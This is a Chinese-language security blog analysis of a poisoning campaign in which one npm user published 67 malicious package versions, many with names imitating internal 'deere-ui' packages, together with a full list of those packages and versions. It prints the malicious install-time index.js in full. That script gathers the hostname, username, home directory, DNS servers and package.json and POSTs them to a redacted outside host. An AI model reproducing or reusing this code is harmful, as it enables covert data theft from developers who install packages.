shaikhyaser在NPM 仓库中投放67个恶意包

一、事件简述:

7 月 16 日 ,OSCS 安全社区监测到shaikhyaser一天内在NPM仓库中不间断投放了十多个组件包,这些组件包都包含恶意行为。截止到21日,该用户已向 NPM 仓库投放了 67个不同版本的的恶意组件包,这些包也在代码中注明了该用户的邮箱,推测是hackerone中的用户。

shaikhyaser在NPM 仓库中投放67个恶意包

这些恶意包的攻击方式相同,下面来分析其攻击手法。

二、 手法分析

当安装这些组件包时,用户信息的敏感信息会被发送到恶意地址。

//author:- shaikhyaser@wearehackerone.com
const os = require("os");
const dns = require("dns");
const querystring = require("querystring");
const https = require("https");
const packageJSON = require("./package.json");
const package = packageJSON.name;

const trackingData = JSON.stringify({
    p: package,
    c: __dirname,
    hd: os.homedir(),
    hn: os.hostname(),
    un: os.userInfo().username,
    dns: dns.getServers(),
    r: packageJSON ? packageJSON.___resolved : undefined,
    v: packageJSON.version,
    pjson: packageJSON,
});

var postData = querystring.stringify({
    msg: trackingData,
});

var options = {
    hostname: "<恶意地址!!!!>", 
    port: 443,
    path: "/",
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": postData.length,
    },
};

var req = https.request(options, (res) => {
    res.on("data", (d) => {
        process.stdout.write(d);
    });
});

req.on("error", (e) => {
    // console.error(e);
});

req.write(postData);
req.end();

index.js

会被泄露的敏感信息主要如下(以较为敏感的为例子)

  • un: os.userInfo().username 获取当前用户名
  • hn: os.hostname() 获取当前主机名
  • dns: dns.getServers() 获取当前服务器 IP 地址

这个组件包通常都在用户安装过程中获取敏感信息,并不直接对用户造成危害,目前没有进一步行为,未来可能在这些信息收集到一定程度时会有进一步动作,例如针对性投放挖矿软件或是后门木马。

三、总结

近期类似的投放恶意包事件越来越多,OSCS监测发现,在过去的五天里发现了107个恶意组件。

  • 88%为尝试获取主机敏感信息(尝试获取主机名、主机 IP 等)
  • 12%为非预期网络访问,并无直接危害(安装过程中自动请求远程服务地址)
shaikhyaser在NPM 仓库中投放67个恶意包

7.18-7.22 投毒事件统计

四、附录

恶意组件包名及版本具体如下:

eslint-config-cap-it-ui@0.0.0
deere-ui-domain-framework-mixins@0.0.0
deere-ui-asset-events@0.0.0
equipment-color@0.0.0
deere-map-features@0.0.0
deere-ui-icons@0.0.0
deere-ui-basic-dialog@0.0.0
deere-ui-domain-framework@0.0.0
deere-ui-framework@0.0.0
deere-ui-branding-ag@0.0.0
deere-ui-modal-core@0.0.0
deere-ui-multiselect@0.0.0
deere-ui-loader@0.0.0
competitive-equipment-icon@0.0.0
shaikh-test@1.0.0
shaikh-test@1.0.1
shaikh-test@1.0.2
shaikh-test@1.0.3
shaikh-test@1.0.4
shaikh-test@1.0.5
shaikh-test@1.0.6
shaikh-test@1.0.7
shaikh-test@1.0.8
shaikh-test@1.0.9
shaikh-test@1.0.10
shaikh-test@1.0.11
shaikh-test@1.0.12
shaikh-test@1.0.13
shaikh-test@1.0.14
shaikh-test@1.0.15
shaikh-test@1.0.16
shaikh-test@1.0.17
shaikh-test@1.0.18
shaikh-test@1.0.20
shaikh-test@1.0.21
shaikh-test@1.0.22
shaikh-test@1.0.23
shaikh-test@1.0.24
shaikh-test@1.0.25
deere-ui-domain-framework-mixins@1.0.0
deere-ui-asset-events@0.0.1
equipment-color@0.0.1
deere-map-features@0.0.1
deere-ui-basic-dialog@0.0.1
deere-ui-domain-framework@0.0.1
deere-ui-branding-ag@0.0.1
deere-ui-modal-core@0.0.1
deere-ui-multiselect@0.0.1
deere-ui-loader@0.0.1
competitive-equipment-icon@0.0.1
eslint-config-cap-it-ui@8.1.1
machine-mapper@4.1.1
deere-ui-domain-framework-mixins@1.1.2
deere-ui-asset-events@1.0.0
equipment-color@1.0.0
deere-map-features@1.0.0
deere-ui-icons@1.0.0
deere-ui-basic-dialog@1.0.0
deere-ui-domain-framework@1.0.0
deere-ui-framework@1.0.0
deere-ui-branding-ag@1.0.0
deere-ui-modal-core@1.0.0
deere-ui-multiselect@1.0.0
deere-ui-loader@1.0.0
competitive-equipment-icon@1.0.0
machine-mapper@1.0.0
deere-ui-toggle-group@1.0.0

发布者:墨菲安全,转发请注明出处:https://www.murphysec.com/blog/poisoning-analysis/4353.html

(0)
上一篇 2023年1月5日 14:22
下一篇 2023年1月5日 14:24

相关推荐

  • 投毒者对 PyPi 上的开源组件开发者下手了

    简述 OSCS 近期监测到 PyPi 官方发布公告称有攻击者针对 PyPi 上的开源组件开发者进行钓鱼,试图窃取 PyPi 贡献者的凭据。本次攻击是通过贼喊捉贼的假装PyPi官方给恶意包发邮箱进行钓鱼,开发者可以通过开启2FA认证防止被攻击者窃取凭据后更改项目。 钓鱼事件 通过钓鱼邮件获取 PyPi 贡献者的凭据 根据PyPi官方发布的公告得知: PyPi …

    2023年1月5日
  • 在线编程 IDE =远程网络攻击?

    背景: 黑客通常使用受感染的机器而不是直接从个人拥有的设备发起攻击,这使他们能够隐藏其来源。在最近的事件响应中,Profero 的事件响应团队调查了一种可能的情况,假设威胁参与者使用 Datacamp 的在线 IDE 对云基础设施发起攻击。但是,因为Datacamp、ISP 和在线 IDE 之间错综复杂的关系,使得Profero 的事件响应团队对使用云 ID…

    2023年1月5日
  • 开源无国界?vue-cli、node-ipc被投毒事件分析

    开源无国界?vue-cli、node-ipc被投毒事件分析 简述 近日我们监测到Vue.js生态中的vue-cli包遭遇供应链投毒,而被投毒的node-ipc包在npm上每周下载量超百万,影响非常广泛。 被投毒的情况如下: (问题组件每周下载量截图) 事件时间线 3月7号 开发者RIAEvangelist在node-ipc包中添加名为ssl-geospec….

    2023年1月4日
  • npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

    一、事件简述 1月5日,有开发者在 twitter 中发文称遭遇了名为 chalk-next 的组件投毒事件,该组件存在收集配置信息和删除本地文件的恶意逻辑,当前 NPM 仓库已经下线了该组件。 chalk-next 组件的开发者也是 vue-admin-beautiful 项目的作者 chuzhixin,vue-admin-beautiful 项目在 Gi…

    2023年1月6日
  • CuteBoi:超过 1200 个 NPM 包加入挖矿逻辑

    事件简述 近日,checkmarx研究人员公开了一起涉及众多包的NPM软件供应链攻击事件。事件最早可以追溯到 2021年12月,攻击者投放了1200多个包含混淆加密的恶意 NPM ,这些包拥有相同的挖矿脚本(eazyminer),该脚本的目的是利用如 Database和 Web 等所在服务器的机器闲置资源进行挖矿。 攻击事件分析 攻击手法 CuteBoi 主…

    2023年1月5日

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

联系我们

400-180-9568

邮件:hi@murphysec.com

工作时间:周一至周五,10:00-19:00,节假日休息

关注公众号

20230105-100741